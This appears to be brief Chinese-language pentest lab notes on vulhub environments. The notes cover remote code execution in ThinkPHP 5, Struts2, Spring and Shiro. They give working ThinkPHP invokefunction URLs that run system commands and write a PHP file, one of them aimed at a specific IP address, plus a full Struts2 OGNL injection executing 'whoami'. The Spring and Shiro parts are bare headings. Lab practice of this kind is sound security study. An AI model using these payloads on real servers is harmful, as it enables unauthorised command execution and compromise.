框架
Thinkphp(TP)
vulhub/thinkphp/5-rce
docker-compose up -d启动环境
/index.phps=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.phps=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
http://8.152.3.217:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php phpinfo();?>' >>1.php
测试链接
struts2
打号靶场进来
/struts2-showcase
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
Spring
spring 代码执⾏ (CVE-2018-1273)
抓包
成功写入
Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)
shiro
建立链接